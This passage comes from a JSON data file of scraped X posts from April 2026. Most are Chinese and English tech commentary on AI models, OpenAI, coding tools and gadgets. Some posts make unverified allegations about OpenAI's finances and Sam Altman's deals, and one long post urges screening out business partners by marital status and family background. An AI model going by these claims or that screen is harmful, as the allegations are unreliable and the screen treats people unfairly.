我是韭菜我自豪。😎😎😎", + "url": "https://x.com/CuiMao/status/2049029664639979624", + "published_at": "2026-04-28T07:35:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "找合伙人,先看家室\n\n我知道这个标题会得罪一大堆人。\n\n但我还是要说。\n\n因为这个坑我自己踩过,而且踩得很深,深到现在回想起来还会觉得胸口闷一下。\n\n事情是这样的。去年我找合伙人,找到一个我觉得各方面都很合适的人。能力没问题,聊起来也很投机,对方向的判断跟我高度一致。我当时觉得,就是他了。\n\n然后我就开始掏心掏肺。\n\n我是那种一旦认定了合伙人,就会把底牌全部摊开的人。资源、人脉、我对未来的规划、我手上的牌,全部给你看。因为我觉得合伙人之间如果还藏着掖着,那这个事儿没法做。\n\n对方也表现得很好。我们配合得挺顺畅,我一度觉得这就是我找到的「对的人」。\n\n直到竞争对手出现了。\n\n对方那边也开始对他好。也掏心掏肺,也给资源,也画未来。\n\n然后我发现了一个让我非常懵的事情。\n\n他开始保持中立了。\n\n不是说他背叛了我,没有那么戏剧化。就是。。。他觉得那边也挺好的,两边都不想得罪,两边都想保持关系,两边都不想做选择。\n\n我当时的感受,怎么说呢,不是愤怒。是一种很深的困惑。\n\n我掏心掏肺对你,你转头就觉得另一个掏心掏肺的人也很好?那我算什么?\n\n后来我花了很长时间去想这件事。不是想他这个人有多坏,他可能真的不觉得自己做错了什么。而是想,为什么会这样。\n\n我回头去看他的背景,发现了一些之前没注意到的东西。\n\n他没有家室。没有结婚,没有小孩。这个本身不是问题,很多优秀的人在事业上升期选择不成家,完全可以理解。\n\n但关键是,他的原生家庭也有问题。不是那种「父母离婚」就完事了的问题,是那种从小就没有在一段稳定的、被无条件信任的关系里待过的问题。\n\n我不是心理学专家,但我后来想明白了一件事。\n\n一个从来没有体验过「被无条件信任」的人,他很难理解「忠诚」这两个字到底意味着什么。\n\n不是他不想忠诚。是他的经验里没有这个模型。\n\n你对他好,他觉得好。别人对他好,他也觉得好。他会本能地在所有对他好的人之间保持平衡,因为在他的成长经历里,没有哪段关系是绝对安全的、绝对不会变的。所以他学会的生存策略就是,不把鸡蛋放在一个篮子里。\n\n不全心投入任何一段关系。\n\n这个策略在他个人生活里可能是有效的。但在创业里,这是致命的。\n\n创业合伙人之间的信任,是一种非常特殊的信任。它不像朋友之间,各过各的,偶尔见面吃个饭。它是每天都要一起做决策,一起扛压力,一起面对那些让人睡不着觉的问题。\n\n这种关系需要一个前提,就是我们都确认,我们在同一条船上,不会跳船。\n\n如果你的合伙人随时可能因为别人的示好而动摇,那这条船等于没有底。\n\n说到这里我想补一句,这个观点听着很容易被误解,好像我在歧视没结婚的人或者原生家庭不好的人。\n\n不是这样的。\n\n我说的不是「没有家室的人都不靠谱」。我认识很多没有家室但极其有原则有担当的人。\n\n我说的是一个特定的组合,没有家室,同时原生家庭也存在严重问题。\n\n这两个条件叠在一起的时候,这个人大概率从来没有在任何一段关系里,真正体验过什么叫「我为你兜底,你也为我兜底」。\n\n他可能很聪明,很有能力,甚至人品也不坏。但他缺少一种东西。\n\n承诺感。\n\n就是那种「我说了跟你干,哪怕天塌下来我也跟你干」的感觉。\n\n这玩意不是靠道德教育来的,也不是靠画饼画出来的。它是在长期的、稳定的、互相兜底的亲密关系里慢慢长出来的。\n\n家庭,尤其是自己建立的家庭,是大多数人一生中第一次真正体验「无条件承诺」的地方。你有了老婆孩子,你就知道什么叫不能跑。不是不想跑,是有人在等你回家。\n\n这种体验会重塑一个人对「责任」这个词的理解。\n\n我现在的合伙人,有家室,有小孩。\n\n我能感觉到一个很明显的区别。他做决策的时候,底色是稳的。不是因为他比别人更聪明,是因为他知道自己要为谁负责。这让他天然就会过滤掉那些不靠谱的选项。\n\n遇到困难的时候他不会情绪化,因为他在家里已经练了无数遍「事情很糟但我不能崩」这个技能。有小孩的人都知道,半夜两点孩子发烧你困得不行但你还是得爬起来去医院,这种事情经历多了之后,你对压力的耐受度会提高很多。\n\n我不是说有家室就一定靠谱。有些有家室的人混蛋得很,另一回事。\n\n但至少,有家室给了你一个可以观察的窗口。你可以旁敲侧击地了解,他跟老婆的关系怎么样,他怎么对待自己的小孩,他在家庭里是不是一个愿意扛事的人。\n\n这些信息能帮你判断他在创业的极端压力下会怎么表现。\n\n而一个没有家室、原生家庭也有问题的人,你能观察的窗口很少。他的所有关系都是「可选的」,都是「可以随时退出的」。你很难知道他在一段不能退出的关系里会怎么表现。\n\n因为他可能从来没有过这种关系。\n\n写到这里,突然想到一个比喻。\n\n创业合伙人的关系,其实很像一场婚姻。你们要一起做最重要的决策,一起分最大的利益,也一起扛最重的风险。你们吵架的频率可能比跟老婆吵架还高。你们分手的代价可能比离婚还大。\n\n既然是一场婚姻,那你在「结婚」之前,是不是应该了解一下对方在亲密关系里的表现?\n\n而一个人在亲密关系里的表现,最直接的参考就是他现有的亲密关系。\n\n他的家庭。\n\n如果他没有,而且从小也没有过一个好的范本。\n\n那你就是在跟一个从来没谈过恋爱的人结婚。\n\n可能很好。但风险很大。\n\n在创业这件事上,我个人的选择是,不赌这个概率。\n\n我知道这个标准很苛刻,甚至有点不公平。有些人原生家庭不好,但通过自己的努力修复了自己,变成了一个非常靠谱的人。这样的人存在,而且值得尊敬。\n\n但我必须坦诚地说,在创业找合伙人这个场景下,我没有时间和精力去一一鉴别。\n\n创业的每一天都在烧钱,烧时间,烧精力。你选错一个合伙人,浪费的可能是一两年的时间和几十万上百万的钱。\n\n在这种赌注面前,我选择用一个粗暴但有效的筛选标准来降低风险。\n\n有家室,旁敲侧击确认有责任感。可以聊。\n\n没有家室,但原生家庭健康稳定,成长过程中有过被信任和信任别人的经验。也可以聊。\n\n没有家室,原生家庭也有问题。放弃。\n\n这话说出来很残忍。但创业本身就是一件残忍的事情。你不对合伙人残忍,市场就会对你残忍。\n\n我之前那次经历,到最后不是撕破脸散的,是我主动退了一步,把关系降级成了普通朋友。没有冲突,没有指责,就是安静地把利益切清楚,各走各的。\n\n但那种失去一个你以为可以并肩作战的人的感觉,真的很难受。\n\n就像你以为找到了战友,结果发现他只是一个路过的旅客。他在你这里停一停,在别人那里也停一停,谁给的风景好就多待一会儿。\n\n他没有恶意。\n\n但他不会为你拼命。\n\n而创业,是需要有人为你拼命的。\n\n你也需要为别人拼命。\n\n这种拼命的前提,是你们都知道,除了这条路,没有别的路。\n\n我觉得这件事跟乔布斯说过的那句话有点像,\n\nstay hungry, stay foolish。我再加一句,stay committed。\n\n保持饥饿,保持愚蠢,保持承诺。\n\n三个里面,最难的是最后一个。", + "url": "https://x.com/Pluvio9yte/status/2049026972337197330", + "published_at": "2026-04-28T07:24:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: “Alexander wept, for there were no more situations left to monitor.” cc @MTSlive", + "url": "https://x.com/pmarca/status/2049022953031950466", + "published_at": "2026-04-28T07:08:35+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: x.com/i/article/204902020458…", + "url": "https://x.com/Pluvio9yte/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "大模型还有擂台赛的😂😂😂", + "url": "https://x.com/Pluvio9yte/status/2049021288069599538", + "published_at": "2026-04-28T07:01:58+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "MemOS 是所有记忆系统中我用到的最好的,我前几天发现新添加了记忆可视化插件的内容,然后就安装体验了\n\n原来我们可能好奇到底OpenClaw Hermes此类的Agent到底记住了什么,现在在可视化插件的帮助下,我们终于能够看见了他们记忆的内容。", + "url": "https://x.com/Pluvio9yte/status/2049021003540598840", + "published_at": "2026-04-28T07:00:50+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204900159355…", + "url": "https://x.com/Pluvio9yte/status/2049020395874075090", + "published_at": "2026-04-28T06:58:25+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "谷歌反重力家庭组不能一拖多,改成跟号主共享额度,看来Google Antigravity也被薅怕了", + "url": "https://x.com/realNyarime/status/2049019755336704210", + "published_at": "2026-04-28T06:55:53+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 介绍下我自己,我是互联网大厂的在职算法工程师,在X上公开分享我学习AI、构建产品和第二收入曲线的过程。\n\n公众号:柯基的思考笔记 \n\n下面是一些我搭建的,可能对你有用的东西:\n\n1. 一个每日AI新闻skill,follow 1000+信息源,结合你的个人需求进行定制摘要\n介绍:https://x.com/Keji715/status/2048399133954675034\n源代码:https://github.com/lovekeji-ai/ai-news-keji\n\n2. 一个可以通过applewatch 随时随地记录灵感的工作流\n\n介绍:https://x.com/Keji715/status/2028802127108165685\n\n源代码:https://github.com/lovekeji-ai/listen_watch\n\n3. AI私人跑步教练\n\n介绍:https://x.com/Keji715/status/2034231149451411585\n\n源代码:开源计划中", + "url": "https://x.com/Pluvio9yte/status/2049018122737213860", + "published_at": "2026-04-28T06:49:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: youtube.com/watch?v=6eBSHbLK…", + "url": "https://x.com/runes_leo/status/2049015605710491995", + "published_at": "2026-04-28T06:39:23+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "最近 X 上无数次刷到 @bcherny (Claude Code 作者)的演讲《Mastering Claude Code in 30 minutes》(30 分钟用好 Claude Code)——溯源才发现,其实是一年前的内容。\n\n两点感受:\n- 好内容生命力是真长,一年了依然有这种传播力\n- 大家对\"怎么用好 AI\"的方法论焦虑,在数据上肉眼可见\n\n前两天我专门做了个中文字幕版,有需要的可以看看,重温一下👇\n\n这个视频来自 Anthropic 一年一度的 Code with Claude 大会,5 月初 2026 届就要开了,新内容出来我会再更新一版最新的,关注不错过👀", + "url": "https://x.com/runes_leo/status/2049015602073989130", + "published_at": "2026-04-28T06:39:23+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The cracks inside OpenAI are deepening, and the numbers don’t lie.\n\nWhen your own CFO is sounding the alarm, something is seriously wrong.\n\nCheck this out:\n\n1: OpenAI missed its target of 1 billion weekly active users, and missed multiple monthly revenue targets earlier this year, per WSJ\n\n2: ChatGPT’s share of generative AI web traffic collapsed from 86.7% to 64.5% in just 12 months, while Google’s Gemini surged from 5.7% to 21.5%\n\n3: CFO Sarah Friar has privately warned colleagues that OpenAI may not be able to pay for future computing contracts if revenue doesn’t accelerate, and has been excluded from key infrastructure meetings by Altman as a result\n\n4: Friar is also pushing back on Altman’s aggressive IPO timeline, saying the company is not organisationally ready to meet public company reporting standards\n\n5: OpenAI has committed to roughly $600 billion in future data center spending, projections show the company could burn $200 billion before reaching steady cash flow, even after raising $122 billion in the largest funding round in Silicon Valley history\n\n6: Altman’s own board is now questioning his spending decisions, and court proceedings in Musk’s lawsuit to oust Altman and unwind OpenAI’s for-profit conversion have just begun\n\nThe biggest AI company in the world is valued at $852 billion, and its own CFO isn’t sure it can pay its bills.\n\nOpenAI is the biggest retail trap of the last decade.\n\nIf you want to know where we’re deploying capital next, follow us with notifications on.\n\nMany people will wish they followed sooner.", + "url": "https://x.com/GaryMarcus/status/2049012041164185701", + "published_at": "2026-04-28T06:25:14+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "💯", + "url": "https://x.com/elonmusk/status/2049010754012209457", + "published_at": "2026-04-28T06:20:07+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 第4章:跑了几个月策略,回头对 PnL 报表觉得不对劲。\n\n拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。\n\n亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。\n\n要不要也拉一遍你自己的对账?\nhttps://x.com/runes_leo/status/2049004801078300881?s=20\n———\n\n付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。\n\nhttps://leolabs.me/pm-quant#/pm-quant", + "url": "https://x.com/runes_leo/status/2049006099173626041", + "published_at": "2026-04-28T06:01:37+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 随行WiFiX配置的聚合频宽是100+100+100+90,虽然北京地铁配置的是100+60+100+60", + "url": "https://x.com/realNyarime/status/2049005476243993029", + "published_at": "2026-04-28T05:59:08+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "跑了几个月策略,回头对 PnL 报表觉得不对劲。\n\n拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。\n\n亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。\n\n要不要也拉一遍你自己的对账?\n\n———\n\n付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。\n\nhttps://leolabs.me/pm-quant#/pm-quant", + "url": "https://x.com/runes_leo/status/2049005119069667522", + "published_at": "2026-04-28T05:57:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It’s a mystery. We’ll never know.", + "url": "https://x.com/pmarca/status/2049001817015529591", + "published_at": "2026-04-28T05:44:36+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5 在 Code Arena 排第 9\n\n难道是 OpenAI 编程这块掉队了?\n\n但 Arena 自己的统计负责人,几小时后发了条澄清\n\n这榜单,当前只测前端或者说Web DEV\n\nGPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。\n\n所以不是它编码不行,是它前端这块比 Claude 弱\n\nCode Arena,Code范围仅仅前端也太不合理了吧", + "url": "https://x.com/lxfater/status/2049001091916783635", + "published_at": "2026-04-28T05:41:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Actual anti-AI energy is the newest instance of @robkhenderson’s “luxury beliefs” — a small fringe of elites playing at radical politics. For normal people, AI is a useful app on their phone, and they’ll just use it more and more.", + "url": "https://x.com/pmarca/status/2049001003823829379", + "published_at": "2026-04-28T05:41:22+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 从去年7月份到现在,一路从 Web 排版工具,到 API 服务,再到公众号创作 CLI。\n\n我自己开发者也是创作者,这个产品会尽力保证每个月迭代1次+。\n\n简单说一下目前公众号创作 CLI 支持哪些模式?\n\nAI 模式(免费):生成排版 prompt,由你的 Claude / Codex 继续处理,3 个基础主题,动手能力强的自由定制。\n\nAPI 模式(专业服务):秒级响应,40+ 主题,43 个高级排版模块,确定性输出,团队协作与自动化发布首选。\n\n如果觉得好用,帮忙给个 Star \n\nhttps://github.com/geekjourneyx/md2wechat-skill/", + "url": "https://x.com/Pluvio9yte/status/2048999532768190606", + "published_at": "2026-04-28T05:35:31+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It won’t happen. People say all kinds of things in surveys. Watch what they do instead. And what they do is… use AI.", + "url": "https://x.com/pmarca/status/2048998808143425821", + "published_at": "2026-04-28T05:32:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "华为随身WiFi X目前只有移动版,机卡绑定、白名单机制仅识别移动卡,物联网卡和其他运营商都用不了\n另外直播神器号卡「移动直播臻享卡」只能在这台随身WiFi上用,具体套餐及机制可参考博主「小武是我」发布的视频\n\n感谢通信人家园「玩耍天使」提供的测试数据,在北京地铁12号线实测79C+41C 4cc载波聚合 ,或许华为定高价是为了给友商活路", + "url": "https://x.com/realNyarime/status/2048998165031043180", + "published_at": "2026-04-28T05:30:05+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Don't just reset Codex rate limits for fun, it costs money.\nDon't just reset Codex rate limits for fun, it costs money.\n\n... but the vibes are good ...\n\nI have reset Codex rate limits for ALL paid plans to celebrate a good week and allow everyone to build more with GPT-5.5. Enjoy", + "url": "https://x.com/sama/status/2048997818673537399", + "published_at": "2026-04-28T05:28:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: To those who pit Sam Altman and Elon Musk against each other like a billionaire feud, look, do your own research. \n\nWhen have you ever seen Elon Musk use his money to buy a yacht, a paradise island, or engage in extravagant spending? \nEven the money from this lawsuit, if he wins, will be donated to charity.\n\n On the other hand, why did Sam Altman change the bylaws of OpenAI, which was a non-profit organization? Why is everything opaque at OpenAI? Who benefits from the money? \n\nTo all the skeptics, do your own research. I have no doubt about your conclusions if you seek the truth. \n\nOn one side, there is a man who dedicates his life to the well-being of humanity, and on the other, a man who seeks profit, even at the risk of endangering humanity.\n\nElon Musk must win.", + "url": "https://x.com/elonmusk/status/2048992619926106526", + "published_at": "2026-04-28T05:08:03+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "之前闲鱼95折收的号内E卡,帮我代下单。昨天派出所给我打电话,让我今天去做笔录,还问我买的东西在不在,是不是想让我退赃\n\n于是早上8点到就到派出所做笔录,花了2个小时。和民警了解到,受害人是被骗了10多万的大润发卡,10500的京东E卡,京东E卡分别给10来个人下单,我是其中一个\n笔录上把我当成刑事案件的证人,写了我买E卡的过程,提供了卖E卡人的相关信息\n\n涉案的E卡,和我有关的只有1700多元,还好。主要1月份到现在向这个人买了大几万的E卡,希望后续不要再遇到了,果然贪小便宜吃大亏", + "url": "https://x.com/realNyarime/status/2048992199208251709", + "published_at": "2026-04-28T05:06:23+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Oh no", + "url": "https://x.com/pmarca/status/2048988054220615991", + "published_at": "2026-04-28T04:49:55+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control their companies through super voting shares (instead of ceding control to VCs) need to start preparing to leave the state. I wish we could entice more founders to come and build here instead of forcing people away. The top 1% of earners pay 40% of income tax (CA actually has the most progressive income/cap gains tax system in the world). If we could double that 1% group (by building people up and recruiting people here), we’d increase our taxes by 40%! Instead, we are pushing away those top 1% of earners and risking dropping our tax revenue by 40%. And for founders with super voting, they effectively are forced to leave. Basically we need to hope that Gavin pulls off a last minute save and negotiates with the sponsoring union to pull the Wealth Tax proposition.", + "url": "https://x.com/naval/status/2048985810842865914", + "published_at": "2026-04-28T04:41:00+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: South Korean reporter after experiencing @Tesla FSD (Supervised) in the country for the first time:\n\n\"It flawlessly performed all tasks, including obeying traffic signals, staying in lanes, adhering to speed limits, merging, and changing directions. I felt no anxiety or frustration.\n\nTesla’s FSD capabilities surpassed expectations. Even in heavily congested urban roads, no human intervention was needed. While driving in the right lane on a four-lane road, the vehicle smoothly merged into the left lane when it detected a parked delivery truck ahead. After passing the truck, it returned to the right lane. When making a right turn, it stopped precisely at the crosswalk. It felt as though the vehicle followed traffic laws more accurately than humans.\"", + "url": "https://x.com/elonmusk/status/2048985482709676382", + "published_at": "2026-04-28T04:39:42+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "卧槽,不用 ChatGPT 改一遍简历就要被算法刷掉?\n\n这条 22k 赞推文说有论文证明:AI 筛简历 97.6% 偏向 ChatGPT 改写版,GPT-4o 自偏好 97.6% / LLaMA 96.3% / DeepSeek 95.5%——原推还说 99% 大公司用 AI 筛、多数用 GPT-4o,所以你写的简历直接被算法歧视。\n\n去 arxiv 翻了原论文(2509.00462,AAAI/ACM AIES 2025 已发表,作者 Jiannan Xu / Gujie Li / Jane Yi Jiang):\n\n- 自偏好率论文给的是 67%-82% 范围,不是推文的 95-97%\n- 候选人用同款 AI 过初筛加成 23%-60% 是真的\n- 团队 3 个作者,不是 7 个人\n\n研究方向真实,但传播链把数字往上拉了 15-30 个百分点。\n\n真结论已经够刺激了——67%-82% 自偏好 + 23-60% 加成,完全够撑起\"该用 ChatGPT 改简历\"的行动建议。但传播这条用的是 95-97%——恐惧叙事的传播效率比真实数据高了好几倍。\n\n下次扫到太干净的整数百分比(97.6 / 96.3 / 95.9 这种工整递减),直接 arxiv 搜论文标题对一下表格里的数字,30 秒就能识别水分。", + "url": "https://x.com/runes_leo/status/2048985055842730341", + "published_at": "2026-04-28T04:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "OpenAI, which squandered its tremendous lead and is now missing its projections, is in trouble.\n\nThere’s no two ways about it.", + "url": "https://x.com/GaryMarcus/status/2048983482685440365", + "published_at": "2026-04-28T04:31:45+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Let me get this straight:\n\n> the top 1% earners in CA pay a cumulative $40-$50b/yr in income tax \n\n> yet CA Medicaid alone loses $50b/yr in fraud\n\nSo, you can work your whole life to be incredibly successful, and bureaucrats in CA will redistribute it to fraudsters\n\nThe Bolscheviks working to pass an asset seizure cannot be trusted.", + "url": "https://x.com/elonmusk/status/2048980534370410757", + "published_at": "2026-04-28T04:20:02+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣", + "url": "https://x.com/dingyi/status/2048980519019528349", + "published_at": "2026-04-28T04:19:58+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "http://dragoncode.codes 目前全面支持GPT-5.5和GPT-Image-2 可开发票 \n\n其实我觉得最有价值的不是我们的中转站,是我们的售后群。\n\n目前已经从售后群里分列出来了跨境交流群,技术交流群。甚至有中学老师用AI撬动了杠杆得到了群友的一直惊叹。\n\n昨天群里技术大牛交流的agent我都看不懂了,还是中转站的高手多🤡", + "url": "https://x.com/Pluvio9yte/status/2048980307605635336", + "published_at": "2026-04-28T04:19:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "When you project exponential growth – and miss.\n\nI stand by my call that OpenAI is likely to someday be seen as the WeWork of AI.", + "url": "https://x.com/GaryMarcus/status/2048976920629645554", + "published_at": "2026-04-28T04:05:40+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Opus 4.7 的任务遵从性好点,但是其他方面都不如GPT-5.5了\n\n可以用性方面,GPT-5.5很容易低价购得,不被封号", + "url": "https://x.com/lxfater/status/2048971387872620715", + "published_at": "2026-04-28T03:43:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🇺🇸 Another deranged liberal openly disappointed Trump wasn’t assassinated.\n\nThese people are actually upset he survived. What the hell is wrong with them?", + "url": "https://x.com/elonmusk/status/2048967507432681518", + "published_at": "2026-04-28T03:28:16+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中...\n\nhttps://100t.xiaomimimo.com/", + "url": "https://x.com/dingyi/status/2048967160287072576", + "published_at": "2026-04-28T03:26:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: We will ship again this week. Codex 